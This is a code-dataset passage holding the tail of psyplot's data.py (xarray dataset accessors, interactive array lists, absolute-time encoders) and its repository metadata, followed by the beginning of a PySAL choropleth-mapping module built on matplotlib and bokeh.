Any iterable that contains :class:`InteractiveBase` instances
%(ArrayList.rename.parameters.new_name)s
Raises
------
%(ArrayList.rename.raises)s
See Also
--------
list.extend, append, rename"""
        # extend those arrays that aren't already in the list
super(ArrayList, self).extend(t[0] for t in filter(
lambda t: t[1] is not None, (
self.rename(arr, new_name) for arr in iterable)))
def remove(self, arr):
"""Removes an array from the list
Parameters
----------
arr: str or :class:`InteractiveBase`
The array name or the data object in this list to remove
Raises
------
ValueError
If no array with the specified array name is in the list"""
name = arr if isinstance(arr, six.string_types) else arr.psy.arr_name
if arr not in self:
raise ValueError(
"Array {0} not in the list".format(name))
for i, arr in enumerate(self):
if arr.psy.arr_name == name:
del self[i]
return
raise ValueError(
"No array found with name {0}".format(name))
@xr.register_dataset_accessor('psy')
class DatasetAccessor(object):
"""A dataset accessor to interface with the psyplot package"""
_filename = None
_data_store = None
_num = None
_plot = None
#: The concatenation dimension for datasets opened with open_mfdataset
_concat_dim = None
#: The combine method to open multiple datasets with open_mfdataset
_combine = None
@property
def num(self):
"""A unique number for the dataset"""
if self._num is None:
self._num = next(_ds_counter)
return self._num
@num.setter
def num(self, value):
self._num = value
def __init__(self, ds):
self.ds = ds
@property
def plot(self):
"""An object to generate new plots from this dataset
To make a 2D-plot with the :mod:`psy-simple <psy_simple.plugin>`
plugin, you can just type
.. code-block:: python
project = ds.psy.plot.plot2d(name='variable-name')
It will create a new subproject with the extracted and visualized data.
See Also
--------
psyplot.project.DatasetPlotter: for the different plot methods
"""
if self._plot is None:
import psyplot.project as psy
self._plot = psy.DatasetPlotter(self.ds)
return self._plot
@property
def filename(self):
"""The name of the file that stores this dataset"""
fname = self._filename
if fname is None:
fname = get_filename_ds(self.ds, dump=False)[0]
return fname
@filename.setter
def filename(self, value):
self._filename = value
@property
def data_store(self):
"""The :class:`xarray.backends.common.AbstractStore` used to save the
dataset"""
store_info = self._data_store
if store_info is None or any(s is None for s in store_info):
store = getattr(self.ds, '_file_obj', None)
store_mod = store.__module__ if store is not None else None
store_cls = store.__class__.__name__ if store is not None else None
return store_mod, store_cls
return store_info
@data_store.setter
def data_store(self, value):
self._data_store = value
@docstrings.dedent
def create_list(self, *args, **kwargs):
"""
Create a :class:`psyplot.data.ArrayList` with arrays from this dataset
Parameters
----------
%(ArrayList.from_dataset.parameters)s
Other Parameters
----------------
%(ArrayList.from_dataset.other_parameters)s
Returns
-------
%(ArrayList.from_dataset.returns)s
See Also
--------
psyplot.data.ArrayList.from_dataset"""
return ArrayList.from_dataset(self.ds, *args, **kwargs)
def to_array(self, *args, **kwargs):
"""Same as :meth:`xarray.Dataset.to_array` but sets the base"""
# the docstring is set below
ret = self.ds.to_array(*args, **kwargs)
ret.psy.base = self.ds
return ret
to_array.__doc__ = xr.Dataset.to_array.__doc__
def __getitem__(self, key):
ret = self.ds[key]
if isinstance(ret, xr.DataArray):
ret.psy.base = self.ds
return ret
def __getattr__(self, attr):
if attr != 'ds' and attr in self.ds:
ret = getattr(self.ds, attr)
ret.psy.base = self.ds
return ret
else:
            raise AttributeError("%s has no attribute %s" % (
self.__class__.__name__, attr))
def copy(self, deep=False):
"""Copy the array
This method returns a copy of the underlying array in the :attr:`arr`
attribute. It is more stable because it creates a new `psy` accessor"""
ds = self.ds.copy(deep)
ds.psy = DatasetAccessor(ds)
return ds
class InteractiveList(ArrayList, InteractiveBase):
"""List of :class:`InteractiveArray` instances that can be plotted itself
This class combines the :class:`ArrayList` and the interactive plotting
through :class:`psyplot.plotter.Plotter` classes. It is mainly used by the
:mod:`psyplot.plotter.simple` module"""
no_auto_update = property(_no_auto_update_getter,
doc=_no_auto_update_getter.__doc__)
@no_auto_update.setter
def no_auto_update(self, value):
ArrayList.no_auto_update.fset(self, value)
InteractiveBase.no_auto_update.fset(self, value)
@property
@docstrings
def _njobs(self):
"""%(InteractiveBase._njobs)s"""
        ret = super(InteractiveList, self)._njobs or [0]
ret[0] += 1
return ret
@property
def psy(self):
"""Return the list itself"""
return self
logger = InteractiveBase.logger
docstrings.delete_params('InteractiveBase.parameters', 'auto_update')
@docstrings.dedent
def __init__(self, *args, **kwargs):
"""
Parameters
----------
%(ArrayList.parameters)s
%(InteractiveBase.parameters.no_auto_update)s"""
ibase_kwargs, array_kwargs = utils.sort_kwargs(
kwargs, ['plotter', 'arr_name'])
self._registered_updates = {}
InteractiveBase.__init__(self, **ibase_kwargs)
with self.block_signals:
ArrayList.__init__(self, *args, **kwargs)
@docstrings.dedent
def _register_update(self, method='isel', replot=False, dims={}, fmt={},
force=False, todefault=False):
"""
Register new dimensions and formatoptions for updating
Parameters
----------
%(InteractiveArray._register_update.parameters)s"""
ArrayList._register_update(self, method=method, dims=dims)
InteractiveBase._register_update(self, fmt=fmt, todefault=todefault,
replot=bool(dims) or replot,
force=force)
@docstrings.dedent
def start_update(self, draw=None, queues=None):
"""
Conduct the formerly registered updates
This method conducts the updates that have been registered via the
:meth:`update` method. You can call this method if the
:attr:`auto_update` attribute of this instance is True and the
`auto_update` parameter in the :meth:`update` method has been set to
False
Parameters
----------
%(InteractiveBase.start_update.parameters)s
Returns
-------
%(InteractiveBase.start_update.returns)s
See Also
--------
:attr:`no_auto_update`, update
"""
if queues is not None:
queues[0].get()
try:
for arr in self:
arr.psy.start_update(draw=False)
self.onupdate.emit()
except Exception:
self._finish_all(queues)
raise
if queues is not None:
queues[0].task_done()
return InteractiveBase.start_update(self, draw=draw, queues=queues)
def to_dataframe(self):
def to_df(arr):
df = arr.to_pandas()
if hasattr(df, 'to_frame'):
df = df.to_frame()
if not keep_names:
return df.rename(columns={df.keys()[0]: arr.psy.arr_name})
return df
if len(self) == 1:
return self[0].to_series().to_frame()
else:
            keep_names = len(set(arr.name for arr in self)) == len(self)
df = to_df(self[0])
for arr in self[1:]:
df = df.merge(to_df(arr), left_index=True, right_index=True,
how='outer')
return df
docstrings.delete_params('ArrayList.from_dataset.parameters', 'plotter')
docstrings.delete_kwargs('ArrayList.from_dataset.other_parameters',
'args', 'kwargs')
@classmethod
@docstrings.dedent
def from_dataset(cls, *args, **kwargs):
"""
Create an InteractiveList instance from the given base dataset
Parameters
----------
%(ArrayList.from_dataset.parameters.no_plotter)s
plotter: psyplot.plotter.Plotter
The plotter instance that is used to visualize the data in this
list
make_plot: bool
If True, the plot is made
Other Parameters
----------------
%(ArrayList.from_dataset.other_parameters.no_args_kwargs)s
``**kwargs``
Further keyword arguments may point to any of the dimensions of the
data (see `dims`)
Returns
-------
%(ArrayList.from_dataset.returns)s"""
plotter = kwargs.pop('plotter', None)
make_plot = kwargs.pop('make_plot', True)
instance = super(InteractiveList, cls).from_dataset(*args, **kwargs)
if plotter is not None:
plotter.initialize_plot(instance, make_plot=make_plot)
return instance
def extend(self, *args, **kwargs):
# reimplemented to emit onupdate
super(InteractiveList, self).extend(*args, **kwargs)
self.onupdate.emit()
def append(self, *args, **kwargs):
# reimplemented to emit onupdate
super(InteractiveList, self).append(*args, **kwargs)
self.onupdate.emit()
def to_interactive_list(self):
return self
class _MissingModule(object):
"""Class that can be used if an optional module is not avaible.
This class raises an error if any attribute is accessed or it is called"""
def __init__(self, error):
"""
Parameters
----------
error: ImportError
            The error that was raised when trying to import the module"""
self.error = error
def __getattr__(self, attr):
raise self.error
def __call__(self, *args, **kwargs):
raise self.error
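# Editor's note: a short sketch of how `_MissingModule` is meant to be used
# as a placeholder for an optional dependency. The module name below is
# hypothetical.
def _example_missing_module():
    try:
        import some_optional_module  # hypothetical optional dependency
    except ImportError as e:
        some_optional_module = _MissingModule(e)
    # any attribute access or call now re-raises the original ImportError
    # instead of a less helpful NameError later on
    return some_optional_module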
def _open_ds_from_store(fname, store_mod=None, store_cls=None, **kwargs):
"""Open a dataset and return it"""
if isinstance(fname, xr.Dataset):
return fname
if not isstring(fname):
try: # test iterable
fname[0]
except TypeError:
pass
else:
if store_mod is not None and store_cls is not None:
if isstring(store_mod):
store_mod = repeat(store_mod)
if isstring(store_cls):
store_cls = repeat(store_cls)
fname = [_open_store(sm, sc, f)
for sm, sc, f in zip(store_mod, store_cls, fname)]
kwargs['engine'] = None
kwargs['lock'] = False
return open_mfdataset(fname, **kwargs)
else:
# try guessing with open_dataset
return open_mfdataset(fname, **kwargs)
if store_mod is not None and store_cls is not None:
fname = _open_store(store_mod, store_cls, fname)
return open_dataset(fname, **kwargs)
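# Editor's note: a hedged sketch of the call paths of `_open_ds_from_store`.
# The file names are hypothetical; without store information the function
# simply falls back to `open_dataset` or `open_mfdataset`.
def _example_open_ds_from_store():
    # a single file name -> handled by open_dataset
    ds = _open_ds_from_store('single_file.nc')
    # an iterable of file names -> handled by open_mfdataset
    ds_multi = _open_ds_from_store(['file1.nc', 'file2.nc'])
    return ds, ds_multi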
def decode_absolute_time(times):
def decode(t):
day = np.floor(t).astype(int)
sub = t - day
rest = dt.timedelta(days=sub)
# round microseconds
if rest.microseconds:
rest += dt.timedelta(microseconds=1e6 - rest.microseconds)
return np.datetime64(dt.datetime.strptime(
"%i" % day, "%Y%m%d") + rest)
return np.vectorize(decode, [np.datetime64])(times)
def encode_absolute_time(times):
def encode(t):
t = to_datetime(t)
return float(t.strftime('%Y%m%d')) + (
t - dt.datetime(t.year, t.month, t.day)).total_seconds() / 86400.
return np.vectorize(encode, [float])(times)
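# Editor's note: a round-trip sketch of the absolute-time codec above. The
# encoding stores a time stamp as the float YYYYMMDD.<fraction of day>, so
# noon on 2016-01-01 becomes 20160101.5. Assumes `to_datetime` accepts a
# plain :class:`datetime.datetime`.
def _example_absolute_time_roundtrip():
    encoded = encode_absolute_time([dt.datetime(2016, 1, 1, 12)])
    # encoded -> array([ 20160101.5])
    decoded = decode_absolute_time(encoded)
    # decoded -> array of numpy.datetime64 for 2016-01-01T12:00:00
    return encoded, decoded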
class AbsoluteTimeDecoder(NDArrayMixin):
def __init__(self, array):
self.array = array
example_value = first_n_items(array, 1) or 0
try:
result = decode_absolute_time(example_value)
except Exception:
logger.error("Could not interprete absolute time values!")
raise
else:
self._dtype = getattr(result, 'dtype', np.dtype('object'))
@property
def dtype(self):
return self._dtype
def __getitem__(self, key):
return decode_absolute_time(self.array[key])
class AbsoluteTimeEncoder(NDArrayMixin):
def __init__(self, array):
self.array = array
example_value = first_n_items(array, 1) or 0
try:
result = encode_absolute_time(example_value)
except Exception:
logger.error("Could not interprete absolute time values!")
raise
else:
self._dtype = getattr(result, 'dtype', np.dtype('object'))
@property
def dtype(self):
return self._dtype
def __getitem__(self, key):
return encode_absolute_time(self.array[key])
|
Chilipp/psyplot
|
psyplot/data.py
|
Python
|
gpl-2.0
| 191,460
|
[
"NetCDF"
] |
32debfed6101e650ae0fab04e49c27c5046cd71d833e0137c5acee30cd3cebc7
|
"""
Choropleth mapping using PySAL
ToDo:
* map_line_shp, map_point_shp should take a shp object not a shp_link
* Same for map_poly_shp(_lonlat)
"""
__author__ = "Sergio Rey <sjsrey@gmail.com>", "Dani Arribas-Bel <daniel.arribas.bel@gmail.com"
from warnings import warn
import pandas as pd
import pysal as ps
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import colors as clrs
import matplotlib as mpl
from matplotlib.pyplot import fill, text
from matplotlib import cm
from matplotlib.patches import Polygon
import collections
from matplotlib.path import Path
from matplotlib.collections import LineCollection, PathCollection, PolyCollection, PatchCollection, CircleCollection
from color import get_color_map
try:
import bokeh.plotting as bk
from bokeh.models import HoverTool
except ImportError:
warn('Bokeh not installed. Functionality ' \
'related to it will not work')
# Classifier helper
classifiers = ps.esda.mapclassify.CLASSIFIERS
classifier = {c.lower():getattr(ps.esda.mapclassify,c) for c in classifiers}
def value_classifier(y, scheme='Quantiles', **kwargs):
"""
Return classification for an indexed Series of values
...
Arguments
---------
y : Series
Indexed series containing values to be classified
scheme : str
[Optional. Default='Quantiles'] Name of the PySAL classifier
to be used
**kwargs : dict
Additional arguments specific to the classifier of choice
(see the classifier's documentation for details)
Returns
-------
labels : Series
Indexed series containing classes for each observation
classification : Map_Classifier instance
"""
c = classifier[scheme.lower()](y, **kwargs)
return (pd.Series(c.yb, index=y.index), c)
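# Editor's note: a usage sketch for `value_classifier`. The data are random
# and purely illustrative.
def _example_value_classifier():
    y = pd.Series(np.random.random(100))
    labels, classification = value_classifier(y, scheme='Quantiles', k=5)
    # `labels` holds the bin id (0..4) per observation, aligned on y.index;
    # `classification.bins` holds the upper boundary of every class
    return labels, classification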
# Low-level pieces
def map_point_shp(shp, which='all', bbox=None):
'''
Create a map object from a point shape
...
Arguments
---------
shp : iterable
PySAL point iterable (e.g.
shape object from `ps.open` a point shapefile) If it does
not contain the attribute `bbox`, it must be passed
separately in `bbox`.
which : str/list
                      List of booleans for which points of the shape to
                      be included (True) or excluded (False)
bbox : None/list
[Optional. Default=None] List with bounding box as in a
PySAL object. If nothing is passed, it tries to obtain
it as an attribute from `shp`.
Returns
-------
    map             : PathCollection
                      Scatter collection with the points from the shape
'''
if not bbox:
bbox = shp.bbox
pts = []
if which == 'all':
for pt in shp:
pts.append(pt)
else:
for inwhich, pt in zip(which, shp):
if inwhich:
pts.append(pt)
pts = np.array(pts)
sc = plt.scatter(pts[:, 0], pts[:, 1])
#print(sc.get_axes().get_xlim())
#_ = _add_axes2col(sc, bbox)
#print(sc.get_axes().get_xlim())
return sc
def map_line_shp(shp, which='all', bbox=None):
'''
Create a map object from a line shape
...
Arguments
---------
shp : iterable
PySAL line iterable (e.g.
shape object from `ps.open` a line shapefile) If it does
not contain the attribute `bbox`, it must be passed
separately in `bbox`.
which : str/list
                      List of booleans for which lines of the shape to
be included (True) or excluded (False)
bbox : None/list
[Optional. Default=None] List with bounding box as in a
PySAL object. If nothing is passed, it tries to obtain
it as an attribute from `shp`.
Returns
-------
map : PatchCollection
Map object with the lines from the shape
This includes the attribute `shp2dbf_row` with the
cardinality of every line to its row in the dbf
(zero-offset)
'''
if not bbox:
bbox = shp.bbox
patches = []
rows = []
i = 0
if which == 'all':
for shape in shp:
for xy in shape.parts:
patches.append(xy)
rows.append(i)
i += 1
else:
for inwhich, shape in zip(which, shp):
if inwhich:
for xy in shape.parts:
patches.append(xy)
rows.append(i)
i += 1
lc = LineCollection(patches)
#_ = _add_axes2col(lc, bbox)
lc.shp2dbf_row = rows
return lc
def map_poly_shp(shp, which='all', bbox=None):
'''
Create a map object from a polygon shape
...
Arguments
---------
shp : iterable
PySAL polygon iterable (e.g.
shape object from `ps.open` a poly shapefile) If it does
not contain the attribute `bbox`, it must be passed
separately in `bbox`.
which : str/list
List of booleans for which polygons of the shapefile to
be included (True) or excluded (False)
bbox : None/list
[Optional. Default=None] List with bounding box as in a
PySAL object. If nothing is passed, it tries to obtain
it as an attribute from `shp`.
Returns
-------
map : PatchCollection
Map object with the polygons from the shape
This includes the attribute `shp2dbf_row` with the
cardinality of every polygon to its row in the dbf
(zero-offset)
'''
if not bbox:
bbox = shp.bbox
patches = []
rows = []
i = 0
if which == 'all':
for shape in shp:
for ring in shape.parts:
xy = np.array(ring)
patches.append(xy)
rows.append(i)
i += 1
else:
for inwhich, shape in zip(which, shp):
if inwhich:
for ring in shape.parts:
xy = np.array(ring)
patches.append(xy)
rows.append(i)
i += 1
pc = PolyCollection(patches)
#_ = _add_axes2col(pc, bbox)
pc.shp2dbf_row = rows
return pc
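# Editor's note: a sketch of the low-level pieces chained together, in the
# spirit of `plot_poly_lines` below. Assumes the PySAL example datasets are
# installed.
def _example_map_poly_shp():
    shp = ps.open(ps.examples.get_path('columbus.shp'))
    patchco = map_poly_shp(shp)            # PolyCollection with shp2dbf_row
    patchco.set_facecolor('none')
    patchco.set_edgecolor('0.8')
    ax = setup_ax([patchco], [shp.bbox])   # rescaled, frame-less axes
    return ax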
# Mid-level pieces
def setup_ax(polyCos_list, bboxs, ax=None):
'''
Generate an Axes object for a list of collections
...
Arguments
---------
polyCos_list: list
List of Matplotlib collections (e.g. an object from
map_poly_shp)
bboxs : list
List of lists, each containing the bounding box of the
respective polyCo, expressed as [xmin, ymin, xmax, ymax]
ax : AxesSubplot
(Optional) Pre-existing axes to which append the collections
and setup
Returns
-------
ax : AxesSubplot
Rescaled axes object with the collection and without frame
or X/Yaxis
'''
if not ax:
ax = plt.axes()
for polyCo, bbox in zip(polyCos_list, bboxs):
ax.add_collection(polyCo)
polyCo.axes.set_xlim((bbox[0], bbox[2]))
polyCo.axes.set_ylim((bbox[1], bbox[3]))
abboxs = np.array(bboxs)
ax.set_xlim((abboxs[:, 0].min(), \
abboxs[:, 2].max()))
ax.set_ylim((abboxs[:, 1].min(), \
abboxs[:, 3].max()))
ax.set_frame_on(False)
ax.axes.get_yaxis().set_visible(False)
ax.axes.get_xaxis().set_visible(False)
return ax
def _add_axes2col(col, bbox):
"""
Adds (inplace) axes with proper limits to a poly/line collection. This is
still pretty much a hack! Ideally, you don't have to setup a new figure
for this
...
Arguments
---------
col : Collection
bbox : list
Bounding box as [xmin, ymin, xmax, ymax]
"""
tf = plt.figure()
ax = plt.axes()
minx, miny, maxx, maxy = bbox
ax.set_xlim((minx, maxx))
ax.set_ylim((miny, maxy))
col.set_axes(ax)
plt.close(tf)
return None
def base_choropleth_classless(map_obj, values, cmap='Greys' ):
'''
Set classless coloring from a map object
...
Arguments
---------
map_obj : Poly/Line collection
Output from map_X_shp
values : array
Numpy array with values to map
cmap : str
Matplotlib coloring scheme
Returns
-------
map : PatchCollection
Map object with the polygons from the shapefile and
classless coloring
'''
cmap = cm.get_cmap(cmap)
map_obj.set_cmap(cmap)
if isinstance(map_obj, mpl.collections.PolyCollection):
pvalues = _expand_values(values, map_obj.shp2dbf_row)
map_obj.set_array(pvalues)
map_obj.set_edgecolor('k')
elif isinstance(map_obj, mpl.collections.LineCollection):
pvalues = _expand_values(values, map_obj.shp2dbf_row)
map_obj.set_array(pvalues)
elif isinstance(map_obj, mpl.collections.PathCollection):
if not hasattr(map_obj, 'shp2dbf_row'):
map_obj.shp2dbf_row = np.arange(values.shape[0])
map_obj.set_array(values)
return map_obj
def base_choropleth_unique(map_obj, values, cmap='hot_r'):
'''
Set coloring based on unique values from a map object
...
Arguments
---------
map_obj : Poly/Line collection
Output from map_X_shp
values : array
Numpy array with values to map
cmap : dict/str
[Optional. Default='hot_r'] Dictionary mapping {value:
color}. Alternatively, a string can be passed specifying
the Matplotlib coloring scheme for a random assignment
of {value: color}
Returns
-------
map : PatchCollection
Map object with the polygons from the shapefile and
unique value coloring
'''
if type(cmap) == str:
uvals = np.unique(values)
colormap = getattr(plt.cm, cmap)
colors = [colormap(i) for i in np.linspace(0, 0.9, len(uvals))]
colors = np.random.permutation(colors)
colormatch = {val: col for val, col in zip(uvals, colors)}
elif type(cmap) == dict:
colormatch = cmap
else:
raise Exception("`cmap` can only take a str or a dict")
if isinstance(map_obj, mpl.collections.PolyCollection):
pvalues = _expand_values(values, map_obj.shp2dbf_row)
map_obj.set_color([colormatch[i] for i in pvalues])
map_obj.set_edgecolor('k')
elif isinstance(map_obj, mpl.collections.LineCollection):
pvalues = _expand_values(values, map_obj.shp2dbf_row)
map_obj.set_color([colormatch[i] for i in pvalues])
elif isinstance(map_obj, mpl.collections.PathCollection):
if not hasattr(map_obj, 'shp2dbf_row'):
map_obj.shp2dbf_row = np.arange(values.shape[0])
map_obj.set_array(values)
return map_obj
def base_choropleth_classif(map_obj, values, classification='quantiles',
k=5, cmap='hot_r', sample_fisher=False):
'''
Set coloring based based on different classification
methods
...
Arguments
---------
map_obj : Poly/Line collection
Output from map_X_shp
values : array
Numpy array with values to map
classification : str
                      Classification method to use. Options supported:
* 'quantiles' (default)
* 'fisher_jenks'
* 'equal_interval'
k : int
Number of bins to classify values in and assign a color
to
cmap : str
Matplotlib coloring scheme
sample_fisher : Boolean
Defaults to False, controls whether Fisher-Jenks
classification uses a sample (faster) or the entire
                      array of values. Ignored if
                      'classification' != 'fisher_jenks'. The sample taken
                      at a time amounts to 10% of the values
Returns
-------
map : PatchCollection
Map object with the polygons from the shapefile and
                      classified value coloring
'''
if classification == 'quantiles':
classification = ps.Quantiles(values, k)
boundaries = classification.bins.tolist()
if classification == 'equal_interval':
classification = ps.Equal_Interval(values, k)
boundaries = classification.bins.tolist()
if classification == 'fisher_jenks':
if sample_fisher:
classification = ps.esda.mapclassify.Fisher_Jenks_Sampled(values,k)
else:
classification = ps.Fisher_Jenks(values,k)
boundaries = classification.bins[:]
map_obj.set_alpha(0.4)
cmap = cm.get_cmap(cmap, k+1)
map_obj.set_cmap(cmap)
boundaries = np.insert(boundaries, 0, values.min())
norm = clrs.BoundaryNorm(boundaries, cmap.N)
map_obj.set_norm(norm)
if isinstance(map_obj, mpl.collections.PolyCollection):
pvalues = _expand_values(values, map_obj.shp2dbf_row)
map_obj.set_array(pvalues)
map_obj.set_edgecolor('k')
elif isinstance(map_obj, mpl.collections.LineCollection):
pvalues = _expand_values(values, map_obj.shp2dbf_row)
map_obj.set_array(pvalues)
elif isinstance(map_obj, mpl.collections.PathCollection):
if not hasattr(map_obj, 'shp2dbf_row'):
map_obj.shp2dbf_row = np.arange(values.shape[0])
map_obj.set_array(values)
return map_obj
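# Editor's note: a sketch of a classified choropleth built from the pieces
# above. Assumes the PySAL example datasets are installed.
def _example_choropleth_classif():
    shp = ps.open(ps.examples.get_path('columbus.shp'))
    values = np.array(ps.open(
        ps.examples.get_path('columbus.dbf')).by_col('HOVAL'))
    mobj = map_poly_shp(shp)
    # five quantile bins; colors are assigned through a BoundaryNorm so that
    # every polygon inherits the color of its class
    return base_choropleth_classif(mobj, values,
                                   classification='quantiles', k=5,
                                   cmap='hot_r')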
def base_lisa_cluster(map_obj, lisa, p_thres=0.01):
'''
Set coloring on a map object based on LISA results
...
Arguments
---------
map_obj : Poly/Line collection
Output from map_X_shp
lisa : Moran_Local
LISA object from PySAL
p_thres : float
Significant threshold for clusters
Returns
-------
map : PatchCollection
Map object with the polygons from the shapefile and
unique value coloring
'''
sign = lisa.p_sim < p_thres
quadS = lisa.q * sign
sig_quadS = pd.Series(quadS).values
lisa_patch = base_choropleth_unique(map_obj, sig_quadS, lisa_clrs)
lisa_patch.set_alpha(1)
return lisa_patch
def lisa_legend_components(lisa, p_thres):
'''
Generate the lists `boxes` and `labels` required to build LISA legend
    NOTE: if there are non-significant values, they are consistently placed
    at the end
...
Arguments
---------
lisa : Moran_Local
LISA object from PySAL
p_thres : float
Significant threshold for clusters
Returns
-------
boxes : list
List with colors of the boxes to draw on the legend
labels : list
List with labels to anotate the legend colors, aligned
with `boxes`
'''
sign = lisa.p_sim < p_thres
quadS = lisa.q * sign
cls = list(set(quadS))
boxes = []
labels = []
    cls.sort()  # sort in place (np.sort would return a discarded copy)
for cl in cls:
boxes.append(mpl.patches.Rectangle((0, 0), 1, 1,
facecolor=lisa_clrs[cl]))
labels.append(lisa_lbls[cl])
if 0 in cls:
i = labels.index('Non-significant')
boxes = boxes[:i] + boxes[i+1:] + [boxes[i]]
labels = labels[:i] + labels[i+1:] + [labels[i]]
return boxes, labels
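# Editor's note: a sketch of attaching the legend components to a plot.
# Assumes a fitted `ps.Moran_Local` instance, as built in the __main__
# block at the bottom of this file.
def _example_lisa_legend(lisa, p_thres=0.01):
    boxes, labels = lisa_legend_components(lisa, p_thres)
    plt.legend(boxes, labels, loc=0, fancybox=True)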
def _expand_values(values, shp2dbf_row):
'''
Expand series of values based on dbf order to polygons (to allow plotting
of multi-part polygons).
...
NOTE: this is done externally so it's easy to drop dependency on Pandas
    when necessary/time is available.
Arguments
---------
values : ndarray
                      Values aligned with dbf rows to be plotted (e.g.
choropleth)
shp2dbf_row : list/sequence
Cardinality list of polygon to dbf row as provided by
map_poly_shp
Returns
-------
pvalues : ndarray
Values repeated enough times in the right order to be
passed from dbf to polygons
'''
pvalues = pd.Series(values, index=np.arange(values.shape[0]))\
.reindex(shp2dbf_row)#Expand values to every poly
return pvalues.values
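# Editor's note: a small worked example of `_expand_values`. One dbf row can
# map to several polygons (multi-part shapes), so its value is repeated once
# per polygon, in plotting order.
def _example_expand_values():
    values = np.array([10., 20., 30.])   # one value per dbf row
    shp2dbf_row = [0, 0, 1, 2, 2]        # rows 0 and 2 are multi-part
    return _expand_values(values, shp2dbf_row)
    # -> array([ 10.,  10.,  20.,  30.,  30.])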
# High-level pieces
def geoplot(db, col=None, palette='BuGn', classi='Quantiles',
backend='mpl', color=None, facecolor='#4D4D4D', edgecolor='#B3B3B3',
alpha=1., linewidth=0.2, marker='o', marker_size=20,
ax=None, hover=True, p=None, tips=None, figsize=(9,9), **kwargs):
'''
Higher level plotter for geotables
...
Arguments
---------
db : DataFrame
GeoTable with 'geometry' column and values to be plotted.
col : None/str
[Optional. Default=None] Column holding the values to encode
into the choropleth.
palette : str/palettable palette
String of the `palettable.colorbrewer` portfolio, or a
`palettable` palette to use
classi : str
                      [Optional. Default='Quantiles'] Name of the PySAL
                      classification scheme to apply to `col`
backend : str
[Optional. Default='mpl'] Backend to plot the
geometries. Available options include Matplotlib ('mpl') or
Bokeh ('bk').
color : str/tuple/Series
[Optional. Default=None] Wrapper that sets both `facecolor`
and `edgecolor` at the same time. If set, `facecolor` and
`edgecolor` are ignored. It allows for either a single color
or a Series of the same length as `gc` with colors, indexed
on `gc.index`.
facecolor : str/tuple/Series
[Optional. Default='#4D4D4D'] Color for polygons and points. It
allows for either a single color or a Series of the same
length as `gc` with colors, indexed on `gc.index`.
edgecolor : str/tuple/Series
[Optional. Default='#B3B3B3'] Color for the polygon and point
edges. It allows for either a single color or a Series of
the same length as `gc` with colors, indexed on `gc.index`.
alpha : float/Series
[Optional. Default=1.] Transparency. It allows for either a
single value or a Series of the same length as `gc` with
colors, indexed on `gc.index`.
linewidth : float/Series
[Optional. Default=0.2] Width(s) of the lines in polygon and
line plotting (not applicable to points). It allows for
either a single value or a Series of the same length as `gc`
with colors, indexed on `gc.index`.
marker : str
[Optional. `mpl` backend only. Default='o'] Marker for point
plotting.
marker_size : int/Series
                      [Optional. Default=20] Size of the markers in point
                      plotting
ax : AxesSubplot
[Optional. `mpl` backend only. Default=None] Pre-existing
axes to which append the geometries.
hover : Boolean
[Optional. `bk` backend only. Default=True] Include hover tool.
p : bokeh.plotting.figure
[Optional. `bk` backend only. Default=None] Pre-existing
bokeh figure to which append the collections and setup.
tips : list of strings
series names to add to hover tool
kwargs : Dict
                      Additional named values to be passed to the classifier
                      of choice.
'''
if col:
if hasattr(palette, 'number') and 'k' in kwargs:
if kwargs['k'] > palette.number:
raise ValueError('The number of classes requested is greater than '
'the number of colors available in the palette.')
lbl,c = value_classifier(db[col], scheme=classi, **kwargs)
if type(palette) is not str:
palette = get_color_map(palette=palette, k=c.k)
else:
palette = get_color_map(name=palette, k=c.k)
facecolor = lbl.map({i:j for i,j in enumerate(palette)})
try:
kwargs.pop('k')
except KeyError:
pass
col = [(col, db[col])]
if tips:
for tip in tips:
col.append((tip, db[tip]))
col.append(('index', db.index.values))
col = collections.OrderedDict(col) # put mapped variable at the top
    if backend == 'mpl':
plot_geocol_mpl(db['geometry'], facecolor=facecolor, ax=ax,
color=color, edgecolor=edgecolor, alpha=alpha,
linewidth=linewidth, marker=marker, marker_size=marker_size,
figsize=figsize,
**kwargs)
    elif backend == 'bk':
plot_geocol_bk(db['geometry'], facecolor=facecolor,
color=color, edgecolor=edgecolor, alpha=alpha,
linewidth=linewidth, marker_size=marker_size,
hover=hover, p=p, col=col, **kwargs)
else:
warn("Please choose an available backend")
return None
def plot_geocol_mpl(gc, color=None, facecolor='0.3', edgecolor='0.7',
alpha=1., linewidth=0.2, marker='o', marker_size=20,
ax=None, figsize=(9,9)):
'''
Plot geographical data from the `geometry` column of a PySAL geotable to a
matplotlib backend.
...
Arguments
---------
gc : DataFrame
GeoCol with data to be plotted.
color : str/tuple/Series
[Optional. Default=None] Wrapper that sets both `facecolor`
and `edgecolor` at the same time. If set, `facecolor` and
`edgecolor` are ignored. It allows for either a single color
or a Series of the same length as `gc` with colors, indexed
on `gc.index`.
facecolor : str/tuple/Series
[Optional. Default='0.3'] Color for polygons and points. It
allows for either a single color or a Series of the same
length as `gc` with colors, indexed on `gc.index`.
edgecolor : str/tuple/Series
[Optional. Default='0.7'] Color for the polygon and point
edges. It allows for either a single color or a Series of
the same length as `gc` with colors, indexed on `gc.index`.
alpha : float/Series
[Optional. Default=1.] Transparency. It allows for either a
single value or a Series of the same length as `gc` with
colors, indexed on `gc.index`.
linewidth : float/Series
[Optional. Default=0.2] Width(s) of the lines in polygon and
line plotting (not applicable to points). It allows for
either a single value or a Series of the same length as `gc`
with colors, indexed on `gc.index`.
    marker          : str
                      [Optional. Default='o'] Marker style for point
                      plotting
    marker_size     : int
                      [Optional. Default=20] Size of the markers in point
                      plotting
ax : AxesSubplot
[Optional. Default=None] Pre-existing axes to which append the
collections and setup
figsize : tuple
w,h of figure
'''
geom = type(gc.iloc[0])
if color is not None:
facecolor = edgecolor = color
draw = False
if not ax:
f, ax = plt.subplots(1, figsize=figsize)
draw = True
# Geometry plotting
patches = []
ids = []
## Polygons
if geom == ps.cg.shapes.Polygon:
for id, shape in gc.iteritems():
for ring in shape.parts:
xy = np.array(ring)
patches.append(xy)
ids.append(id)
mpl_col = PolyCollection(patches)
## Lines
elif geom == ps.cg.shapes.Chain:
for id, shape in gc.iteritems():
for xy in shape.parts:
patches.append(xy)
ids.append(id)
mpl_col = LineCollection(patches)
facecolor = 'None'
## Points
elif geom == ps.cg.shapes.Point:
edgecolor = facecolor
xys = np.array(zip(*gc)).T
ax.scatter(xys[:, 0], xys[:, 1], marker=marker,
s=marker_size, c=facecolor, edgecolors=edgecolor,
linewidths=linewidth)
mpl_col = None
# Styling mpl collection (polygons & lines)
if mpl_col:
if type(facecolor) is pd.Series:
facecolor = facecolor.reindex(ids)
mpl_col.set_facecolor(facecolor)
